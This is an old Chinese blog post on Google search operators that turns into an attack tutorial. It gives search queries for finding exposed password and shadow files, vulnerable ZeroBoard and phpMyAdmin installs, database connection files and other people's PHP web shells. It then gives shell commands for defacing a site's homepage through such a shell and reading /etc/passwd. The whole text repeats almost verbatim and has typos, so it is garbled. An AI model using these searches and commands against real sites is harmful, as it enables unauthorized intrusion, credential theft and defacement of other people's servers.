作者在 2008-12-17 15:35:26 发布以下内容
intext:
这个就是把网页中的正文内容中的某个字符做为搜索条件,例如在google里输入:intext:动网,将返回所有在网页正文部分包含"动网"的网页。
allintext:
使用方法和intext类似.
intitle:
和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符,例如搜索:intitle:安全天使,将返回所有网页标题中包含“安全天使”的网页。同理allintitle也同intitle类似。
define:
搜索某个词语的定义。搜索:define:hacker,将返回关于hacker的定义。
filetype:
这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的搜索指定类型的文件。例如输入:iletype:doc,将返回所有以doc结尾的文件URL。当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富。
info:
查找指定站点的一些基本信息。
inurl:
搜索我们指定的字符是否存在于URL中。例如输入:inurl:admin,将返回N个类似于这样的连接:http://www.xxx.com/xxx/admin。用来找管理员登陆的URL不错。allinurl也同inurl类似,可指定多个字符。
link:
例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了链接的URL。
site:
这个也很有用,例如:site:www.4ngel.net.将返回所有和4ngel.net这个站有关的URL。
对了还有一些符号也是很有用的:
+ 把google可能忽略的字列如查询范围
- 把某个字忽略
~ 同意词
. 单一的通配符
* 通配符,可代表多个字母
"" 精确查询
下面开始说说实际应用
以下内容均在google上搜索,对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了。而google正因为其强大的搜索能力往往会把一些敏感信息透露给他们。用google搜索以下内容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么危害是很大的。同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露漏洞,可以用google来找网上使用这套程序的站点:
intext:ZeroBoard filetype:php
或者使用:
inurlutlogin.php?_zb_path= site:.jp
来寻找我们所需要的页面。phpmyadmin是一套功能强大的数据库操作软件,一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进行操作,我们可以用google搜索存在这样漏洞的程序URL:
intitle:phpmyadmin intext:Create new database
还记http://www.xxx.com/_vti_bin/..%5 ... ystem32/cmd.exe?dir吗?用google找找,你也许还可以找到很多古董级的机器。 同样我们可以用这个找找有其他cgi漏洞的页面。
allinurl:winnt system32
前面已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(access的数据库,mssql、mysql的连接文件等等).举个例子示例一下:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配置不正确的apache+win32的服务器上经常出现这种情况,和上面的原理一样,我们还可以用google来找后台。
1.查找利用php webshell
intitle:"php shell*" "Enable stderr" filetype:php
(注: intitle—网页标题 Enable stderr—UNIX标准输出和标准错误的缩写filetype—文件类型)。搜索结果中,你能找到很多直接在机器上执行命令的web shell来。如果找到的PHPSHELL不会利用,如果你不熟悉UNIX,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明的是,我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填写搜索的内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:
echo "召唤" > index.jsp
现在看看首页,已经被我们改成: "召唤" 了。
我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file > index.html or echo "" > file
echo "test" >> file
这样一条条打出来,站点首页就成功被替换了。同样的也可以
uname -a;cat /etc/passwd
这个就是把网页中的正文内容中的某个字符做为搜索条件,例如在google里输入:intext:动网,将返回所有在网页正文部分包含"动网"的网页。
allintext:
使用方法和intext类似.
intitle:
和上面那个intext差不多,搜索网页标题中是否有我们所要找的字符,例如搜索:intitle:安全天使,将返回所有网页标题中包含“安全天使”的网页。同理allintitle也同intitle类似。
define:
搜索某个词语的定义。搜索:define:hacker,将返回关于hacker的定义。
filetype:
这个我要重点推荐一下,无论是撒网式攻击还是我们后面要说的搜索指定类型的文件。例如输入:iletype:doc,将返回所有以doc结尾的文件URL。当然如果你找.bak、.mdb或.inc也是可以的,获得的信息也许会更丰富。
info:
查找指定站点的一些基本信息。
inurl:
搜索我们指定的字符是否存在于URL中。例如输入:inurl:admin,将返回N个类似于这样的连接:http://www.xxx.com/xxx/admin。用来找管理员登陆的URL不错。allinurl也同inurl类似,可指定多个字符。
link:
例如搜索:inurl:www.4ngel.net可以返回所有和www.4ngel.net做了链接的URL。
site:
这个也很有用,例如:site:www.4ngel.net.将返回所有和4ngel.net这个站有关的URL。
对了还有一些符号也是很有用的:
+ 把google可能忽略的字列如查询范围
- 把某个字忽略
~ 同意词
. 单一的通配符
* 通配符,可代表多个字母
"" 精确查询
下面开始说说实际应用
以下内容均在google上搜索,对于一个居心叵测的攻击者来说,可能他最感兴趣的就是密码文件了。而google正因为其强大的搜索能力往往会把一些敏感信息透露给他们。用google搜索以下内容:
intitle:"index of" etc
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
"# -FrontPage-" inurl:service.pwd
有时候因为各种各样的原因一些重要的密码文件被毫无保护的暴露在网络上,如果被别有用心的人获得,那么危害是很大的。同样可以用google来搜索一些具有漏洞的程序,例如ZeroBoard前段时间发现个文件代码泄露漏洞,可以用google来找网上使用这套程序的站点:
intext:ZeroBoard filetype:php
或者使用:
inurlutlogin.php?_zb_path= site:.jp
来寻找我们所需要的页面。phpmyadmin是一套功能强大的数据库操作软件,一些站点由于配置失误,导致我们可以不使用密码直接对phpmyadmin进行操作,我们可以用google搜索存在这样漏洞的程序URL:
intitle:phpmyadmin intext:Create new database
还记http://www.xxx.com/_vti_bin/..%5 ... ystem32/cmd.exe?dir吗?用google找找,你也许还可以找到很多古董级的机器。 同样我们可以用这个找找有其他cgi漏洞的页面。
allinurl:winnt system32
前面已经简单的说过可以用google来搜索数据库文件,用上一些语法来精确查找能够获得更多东西(access的数据库,mssql、mysql的连接文件等等).举个例子示例一下:
allinurl:bbs data
filetype:mdb inurl:database
filetype:inc conn
inurl:data filetype:mdb
intitle:"index of" data //在一些配置不正确的apache+win32的服务器上经常出现这种情况,和上面的原理一样,我们还可以用google来找后台。
1.查找利用php webshell
intitle:"php shell*" "Enable stderr" filetype:php
(注: intitle—网页标题 Enable stderr—UNIX标准输出和标准错误的缩写filetype—文件类型)。搜索结果中,你能找到很多直接在机器上执行命令的web shell来。如果找到的PHPSHELL不会利用,如果你不熟悉UNIX,可以直接看看LIST,这里就不详细说了,有很多利用价值。要说明的是,我们这里搜索出来的一些国外的PHPSHELL上都要使用UNIX命令,都是system调用出来的函数(其实用百度及其他搜索引擎都可以,只是填写搜索的内容不同)。这个PHPWEBSHELL是可以直接Echo(Unix常用命令)。一句话就把首页搞定了:
echo "召唤" > index.jsp
现在看看首页,已经被我们改成: "召唤" 了。
我们也可以用WGET上传一个文件上去(比如你要替换的叶子吧)。然后execute Command输入 cat file > index.html or echo "" > file
echo "test" >> file
这样一条条打出来,站点首页就成功被替换了。同样的也可以
uname -a;cat /etc/passwd